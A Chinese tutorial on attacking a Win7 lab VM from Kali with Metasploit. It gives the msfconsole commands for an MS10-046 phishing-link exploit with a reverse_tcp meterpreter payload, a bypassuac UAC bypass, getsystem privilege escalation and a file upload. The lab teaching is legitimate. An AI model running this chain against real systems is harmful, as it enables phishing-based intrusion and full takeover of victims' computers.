web安全渗透之钓鱼网站提权

news2024/12/23 12:25:32

本实验实现1:要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功

本实验实现2:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件

在VMware上建立两个虚拟机:win7和kali

Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。

可以永久免费使用,基本上学黑客攻击必会用到这个系统

靶机:Win7 64位 (IP: 192.168.10.36)–用ipconfig进行查询

攻击机:Kali 64位 (IP:192.168.10.21)–用ifconfig进行查询
image.png

【一一帮助安全学习,所有资源一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部教程

image.png

1、实验环境前提条件:

win7中,关闭防火墙(“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项)

保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通)

>ping 192.168.10.36

image.png

2、打开Metasploit渗透工具

Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端

>msfconsole

结果:成功进入,进入到"msf6>"的模式下
image.png

3、查看需要利用的漏洞

搜索漏洞,编号为ms10-046

补充:Windows系统漏洞微软的漏洞编号命名格式为:MS10-046;

MS Micosoft的缩写,固定格式;
10 表示年份,即2010年发布的漏洞;
046 表示顺序,即当年度发布的第46个漏洞。

>search ms10-046

结果:可以看到返回了多条可利用的漏洞模块信息
image.png

4、尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-0模块,进行攻击,进入模块中(注意:必须是“_”,不是“-”,否则会报错)

>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

结果:成功切换到这个模块之下–” msf6 exploit(windows/browser/ms10_046_shortcut_icon_dllloader)>“

并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--没有配置payload,默认为 windows/meterpreter/reverse_tcp
image.png

5、查看该漏洞模块所需的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?

>show options

结果:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注5个参数配置,需要设置哪个就设置哪个:

Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;
SRVHOST(文件共享服务器-kali地址);
SRVPORT(文件共享服务器的端口-使用默认获取的端口即可);
LHOST(发起攻击的地址-kali地址);
LPORT(发起攻击的端口-使用默认获取的端口即可)

补充说明:

1)Payload中包含有需要在远程系统中运行的恶意代码,Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。

2)Payload模块主要有以下三种类型:-Single -Stager -Stage

Single是一种完全独立的Payload,实现的目的也简单,但容易被捕捉到。

Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的Stagers Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接(3次握手-4次挥手)(是一个基于TCP的反向链接反弹shell, 使用起来很稳定)。

Stage是Stager Payload下载的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。

3)windows/x64/meterpreter/reverse_tcp则由一个Stager Payload(reverse_tcp)和一个Stage Payload(meterpreter)组成。

【注意:Payloadwindows/meterpreter/reverse_tcp默认获取到的控制通道meterpreter为32位,

如果想将之后获取到的控制通道meterpreter改为64位,则设置payload:windows/x64/meterpreter/reverse_tcp
image.png

6、设置文件共享服务器

发现仅SRVHOST为空待设置,其它····
(payload/SRVPORT/LHOST/LPORT)均已获取,且正确,设置SRVHOST的对应的参数地址,它指的是文件共享服务器的地址,想一想,要设成谁?为什么?

分析一下:是在哪里用到这个文件共享服务器?是不是会在生成一个钓鱼网址,诱导用户点击了,就会自动给它打开一个文件共享服务器文件夹啊,我们在这用。那你们觉得应该是谁生成这个文件夹呢?是用户那边么?还是攻击者这边?肯定是攻击者这边吧,我们是不知道会有谁点了这个钓鱼网站链接吧

所以,我们才会对这个文件共享服务器的地址设置为kali的地址

>set SRVHOST 192.168.10.21

image.png

7、再次进行检查

>show options

image.png

8、检查无误后,发起攻击

>run

结果:生成一个钓鱼网站的链接“Using URL : http://192.168.10.21:80/,开启服务,等待有人点击该钓鱼网站链接

image.png

9、打开钓鱼网站链接

到win7中,在IE浏览器中打开钓鱼网站链接: http://192.168.10.21:80/,会自动打开文件共享服务器文件夹,文件夹中会生成两个文件,尝试去双击打开“MISvnxTX”快捷方式的文件,即可触发会话连接

结果1:在win7中打开该快捷方式的文件后,不会有任何的反馈结果
image.png

结果2:由于在win7中触发打开了快捷方式的文件,那么,在kali中,则会被触发会话连接,结果显示了是192.168.10.36尝试点击了钓鱼网站链接,并利用ms10-046漏洞模块对目标主机发起了攻击,最终“meterpreter session 1 opened”--表明已经开通192.168.10.21:4444192.168.10.36:49195会话连接1

image.png

10、手动连接会话,进入控制通道

一旦开通一个会话连接后,若系统没有自动进入控制通道,则进行手动连接

10.1)手动查看当前存在的会话

注意在目录msf>下,手动查看当前存在的会话

结果:当前只有会话连接1,meterpreter建立的连接类型type是x84–32位的(由模块中的payload设定),以及展示目标主机192.168.10.36的基本信息和连接信息

>sessions

image.png

10.2)选择连接当前已经开通的会话1,并进入控制通道meterpreter,交互模式,表明攻击成功

>sessions -i 1

image.png

image.png

11、实现上传文件

在控制通道中,从kali主机中上传一个文件到win7中C盘根目录下(前提:在kali的主文件夹中新建1.txt,目录则是/home/kali/1.txt),使用的命令是upload

11.1)正常使用上传文件的命令upload

meterpreter>upload  /home/kali/1.txt  c:\

如果不能立马发聩结果的话,一般要手动回车两次,即可得到结果,但反馈结果提示错误信息:

“operation failed:access is denied”---- 操作失败: 访问被拒绝
image.png

11.2)分析错误的原因

1)先考虑是不是命令书写不对的啊,如果故意将命令书写不对,应该得到的提示是:“运行命令上传错误: 没有这样的文件或目录@rb _ file _ s _ stat-/home/kal/1\. txror”

meterpreter>upload  /home/ka/1.txt  c:\ 

结果:“NO such file or directory.....”--没有这样的文件或目录,明显和“访问被拒绝”不一样,所以可以得到,上述错误不是书写不对的问题。
image.png

2)那这就要考虑,访问被拒绝,是不是权限上的问题,一般来说,权限够的话,命令是不应该被拒绝,所以要考虑提权的问题。

补充

windows系统中用户权限

user【普通用户-张三】;

administrator【管理员用户】;

system【系统用户、虽不可登录,最高权限,但对系统有完整的控制权】;

Linux系统中用户权限

user【普通用户】;

root【超级用户】;

11.3)提权

用于提权,有个常用的命令:getsystem命令

meterpreter>getsystem

结果:提示提权失败,“priv_elevate_getsystem: operation failed:this function is not supported on this system. the following was attempted:” ----操作失败: 该系统不支持此函数
image.png

11.4)为什么会提权失败呢?

首先我们要知道Windows vista系统(2005年微软开发的一款个人桌面操作系统,07年正式出售使用,12年终止它的主流技术支持,17年终止其的一切支持),是微软比较早的一个系统版本。它是在windowsXP和win7之间的一个过渡性系统,明显win7是晚于vista系统开发的

在晚于vista以后的系统中,增加了一个UAC的功能(user access control-用户账户控制),这个功能会对管理员组的用户起到一定的限制作用,目的是为了保护计算机的安全。也就是说,当我们需要运行一些重要的程序时,比如只有管理员权限才能运行的程序时,UAC功能就会弹出一个对话框,对用户进行询问,只有用户点击了同意按钮,程序才会以管理员或者system权限去运行。

因此,我们要想提权成功,首先要绕过windows的UAC限制,然后使用getsystem命令进行提权即可,接下来我们可以使用常用的绕过UAC的套路-bypassuac模块,进行绕过UAC限制

12、使用bypassuac模块绕过UAC限制

12.1)查看当前权限

以上都是我们的分析,认为是权限的问题,那我们就来验证一下吧,看当前的权限到底是不是普通的权限啊,不是最高权限-system。进行当前权限的查看。

而且,即便没有以上这些问题的话,我们也要认清一个事实,就是:在获得了session后,说明建立了至少一个会话了,我们可以通过连接会话,来获取控制通道meterpreter,但注意,这并不意味着我们就可以为所欲为了,必然是会有一个权限的问题,一般不会一上来就能获得最高的权限,所以,会有两种情况:获得system最高权限,或者是普通用户权限

meterpreter>getuid

结果:查看当前获得的用户的权限,只是普通用户权限”18044“,不是最高权限system
image.png

12.2)挂起当前会话

由于bypassuac模块是利用已有的会话连接,绕过UAC限制,最终会获得一个新的会话连接,所以它的前提是要成功开启一个会话连接,并保留下来,且不可以断开连接(exit),以供使用,所以,可以利用background进行返回,将攻击成功以后给我们返回的控制通道meterpreter 后台挂起,将当前的session会话1放入后台

meterpreter>background

结果:成功将session会话1挂起到后台,并没有断开连接,且成功切换到msf >目录下
image.png

**12.3)使用bypassuac模块绕过UAC限制,查看需要利用的漏洞

>search bypassuac

结果:可以看到返回了多条可利用的漏洞模块信息
image.png

12.4)尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-02模块,进行攻击,进入模块中(注意:必须是“_”,不是“-”,否则会报错)

  >use exploit/windows/local/bypassuac

结果:成功切换到这个模块之下

--”msf6 exploit(windows/local/bypassuac)>“

并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--没有配置payload,默认为 windows/meterpreter/reverse_tcp

image.png

12.5)查看该漏洞模块的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况

>show options

结果展示:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注4个参数配置,需要设置哪个就设置哪个:

Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;

SESSION(已开启的会话连接);

LHOST(发起攻击的地址-kali地址);

LPORT(发起攻击的端口-使用默认获取的端口即可)
image.png

12.6)设置目标主机地址

其它(payload/LHOST/LPORT)均已获取,且正确。

发现仅SESSION为空待设置,需要设置,提示“the session to run this module on”-“运行此模块的会话”,我们肯定要设置一个已有的会话号吧,若是没有的会话,设置它也没法用,所以,参数SESSION指的是已开启的会话连接,应设置成我们已有的session连接会话1,被我们挂起放在后台了

>set SESSION 1

image.png

12.7)再次进行检查

>show options

image.png

12.8)检查无误后,发起攻击

>run

结果显示:利用bypassuac漏洞模块对目标主机发起了攻击,成功绕过UAC限制,“meterpreter session 2 opened”–表明已经开通了192.168.10.21:4444和192.168.10.36:49199的新会话连接2
image.png

13**、手动连接会话,进入控制通道**

一旦开通一个新的会话连接后,系统没有自动返回控制通道,进行手动连接

13.1)手动查看当前存在的会话

注意在目录msf>下,结果显示:会话连接1和新生成的会话连接2,meterpreter建立的连接类型type是x84–32位的(由模块中的payload设定),以及展示目标主机192.168.10.36的基本信息和连接信息

>sessions

image.png

13.2)选择连接当前已经开通的新会话2,并进入控制通道meterpreter,交互模式,表明攻击成功

注意:就不要再连接会话1了,我们之前已经试过连接1,到控制通道,发现因权限不够,而提权失败。所以,要选择连接会话2,这是我们利用bypassuac模块绕过UAC功能,开启的新的会话连接,肯定要进到该会话中,才能实现成功提权的目的】

>sessions -i 2

image.png
image.png

14**、查看当前权限,并进行提权**

14.1)进入控制通道后,先查看当前获得的用户的权限

meterpreter>getuid

结果:发现还只是普通用户权限,不是最高权限system

image.png

14.2)再次提权

理论上,我们是通过bypassuac模块获取的该权限,应已绕过了UAC限制,可以成功进行提权操作。用常用的提权命令:getsystem命令

meterpreter>getsystem

结果:“got system” —提示提权成功
image.png

14.3)再次查看当前获得的权限

meterpreter>getuid

结果:获取了最高权限system
image.png

【一一帮助安全学习,所有资源一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部教程

15、再次上传文件

提权成功后,就可以用upload进行文件的上传,从kali传送到win7的C盘下

meterpreter>upload  /home/kali/1.txt  c:\

结果1:成功将kali中的1.txt上传到win7的C盘根目录下
image.png

结果2:在win7中c盘根目录下发现传过来的1.txt文档

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/5167.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【数据结构】单链表(不带头结点)基本操作详解——C语言实现

🚀 作者简介:一名在后端领域学习,并渴望能够学有所成的追梦人。 🐌 个人主页:蜗牛牛啊 🔥 系列专栏:🛹初出茅庐C语言、🛴数据结构 📕 学习格言:博…

Flink系列文档-(YY08)-Flink核心概念

1 核心概念 1.1 基础概念 用户通过算子api所开发的代码,会被flink任务提交客户端解析成jobGraph然后,jobGraph提交到集群JobManager,转化成ExecutionGraph(并行化后的执行图)然后,ExecutionGraph中的各个…

日志冲突怎么解决?slf4j和log4j的区别?看完这一篇,这些都是小意思啦

文章目录一.你的烦恼二.前置知识介绍三.说一说让你头大的各种日志依赖1.Slf4j的核心依赖2.log4j的jar包依赖3.slf4j对于log4j的桥接包的依赖4.log4j对于slf4j的逆转包四.再举一些常见小例子使用slf4j作为门面,log4j作为实现需要引入的依赖使用slf4j作为门面,logback作为实现需要…

[ Linux ] 重定向的再理解,以及文件系统的理解、inode和软硬链接

在上篇文章我们了解了Linux中文件描述符和重定向以及缓冲区的理解,本篇文章我们要对了解一下重定向的再理解、文件系统以及引出inode的意义和软硬链接。 目录 0.重定向 0.1标准输出 标准错误 为什么perror2后面跟了一个success 1.inode 1.1 inode理解 一个in…

一文吃透JavaScript中的DOM知识及用法

文章目录一、前言二、DOM框架三、认识DOM节点四、JS访问DOM1、获取节点2、改变 HTML3、改变 CSS4、检测节点类型5、操作节点间的父子及兄弟关系6、操作节点属性7、创建和操作节点五、快速投票一、前言 DOM:Document Object Model(文档对象模型&#xff0…

指针的进阶应用之双指针、三指针

在牛客网和leetcode等网站刷题的过程中,时常会遇到一些使用双指针和三指针解决问题的实例。今天,我来介绍这两种方法,相信你会对指针的应用会提高一个档次。 目录移除元素删除有序数组中的重复项合并两个有序数组在下面的讲解的过程中&#x…

初步认识系统调用

目录前言一、什么是进程?1、进程与程序的区别?2、什么是进程的控制块二、什么是系统调用?三、认识几个比较简单的系统调用接口1、查看进程2、获取进程的pid/ppid(1).getpid/getppid(2)getpid/getppid的使用3、创建进程的方法总结前言 之前我们…

Redis系列:Redis持久化机制与Redis事务

Redis 是个基于内存的数据库。那服务一旦宕机,内存中数据必将全部丢失。所以丢失数据的恢复对于 Redis 是十分重要的,我们首先想到是可以从数据库中恢复,但是在由 Redis 宕机时(说明相关工作正在运行)且数据量很大情况…

LeetCode刷题记录01

1704判断字符串的两半是否相似序题目我的思路我的代码提交结果其他解简述思路提交结果总结序 我的日常碎碎念:今天下班在看综艺,看到群里班长开了个会议,于是决定开始学习,他说今天的每日一题好简单,让我也去刷一下。嗯…

数组的定义与使用

文章目录数组的基本概念为什么要使用数组什么是数组数组的创建及初始化数组的创建数组的初始化数组的使用数组中元素的访问遍历数组数组是引用类型基本数据类型与引用类型变量的区别认识null数组的应用场景保存数据作为函数的参数参数传基本数据类型参数传数组类型作为函数的返…

TFN T6300A 网络综合测试仪 以太网数据 千兆以太网测试仪 OTDR E1 PRI V.35/V.24 光功率计一体机

一款功能强大、便携式、方便使用、价格便宜的高性价比手持式以太网测试仪是企业中网络管理和维护人员的刚需仪器。好的以太网测试仪可以帮助工作人员迅速解决网络不通、网速慢、丢包、延迟等问题。 当今以太网测试仪市场参差不齐,说的功能一个比一个强,…

你的第一个基于Vivado的FPGA开发流程实践——二选一多路器

你的第一个基于Vivado的FPGA开发流程实践——二选一多路器 1 原理图 2 开发流程 首先我们先打开安装好的Vivado软件 创建一个文件 选择你的开发板 创建一个源文件 现在我们就可以根据原理使用Verilog代码实验这个功能了 module mux2( //端口列表a,b,sel,out);//交代端口类…

RabbitMQ第二个实操小案例——WorkQueue

文章目录RabbitMQ第二个实操小案例——WorkQueueRabbitMQ第二个实操小案例——WorkQueue 讲第二个案例之前,我们先看下前面第一个案例的模型: 可以看到,我们只有一个发布者和一个消费者,通过Queue队列,实现最简单的消…

02 【nodejs开发环境安装】

02 【nodejs开发环境安装】 1.版本介绍 在命令窗口中输入 node -v 可以查看版本0.x 完全不技术 ES64.x 部分支持 ES6 特性5.x 部分支持ES6特性(比4.x多些),属于过渡产品,现在来说应该没有什么理由去用这个了6.x 支持98%的 ES6 特…

e智团队实验室项目-第三周-经典的卷积神经网络的学习

e智团队实验室项目-第三周-卷积神经网络的学习 赵雅玲 *, 张钊* , 李锦玉,迟梦瑶,贾小云,赵尉,潘玉,刘立赛,祝大双,李月,曹海艳, (淮北师范大学计算机科学与技术学院&am…

【树莓派不吃灰】基础篇⑱ 从0到1搭建docker环境,顺便安装一下emqx MQTT Broker、HomeAssistant、portainer

目录1. 前言2. 搭建docker环境3. docker简介3.1 docker解决什么问题?3.2 docker VS vm虚拟机3.2.1 vm虚拟机3.2.2 docker3.3 docker如何解决问题?3.4 docker运行架构3.4.1 镜像 : image3.4.2 容器 : container3.4.3 仓库 : repository3.5 国内镜像加速3.…

python easygui怎么修改默认按钮名字

1.执行以下代码找到easygui安装位置 import easyguiprint(easygui.__file__)2.打开上述路径下boxes文件夹下需要修改的组件 如此时想要修改选项栏的默认按钮名字 则打开choice_box.py文件 执行如下图 可以看到有Cancel、SelectALL、ClearALL、OK四个默认按钮,可否…

Linux下动静态库的制作与使用

学习导航一、关于动静态库的基本认识二、设计库的工程师角度(1)制作静态库(2)制作动态库二、使用库的用户角度(1)使用静态库(2)使用动态库三、理解的角度一、关于动静态库的基本认识 1.静态库 静态库以 .a 作为文件后缀程序在编译链接的时候,将静态库的代码拷贝到…

[TCP/IP] Linux 搭建服务器局域网

文章目录[TCP/IP] Linux 搭建服务器局域网1. 使用python内置库http.server2. 使用Http-Server[TCP/IP] Linux 搭建服务器局域网 1. 使用python内置库http.server python3: http.server 命令行启动: # python 3 python -m http.server 8000 # python 2 python -m S…

ZYNQ_FPGA_SPI通信协议多种实现方式

文章目录PLPSSPIGPIOAXI-GPIOAXI-Quad-SPI(待测试)本文记录一下在使用AD9363中的SPI通信问题,同时针对在ZYNQ系列开发板上实现SPI的方法做一个总结。ZYNQ系列包含了PL端和PS端,因为本科阶段有一定的ARM的开发经验,便想…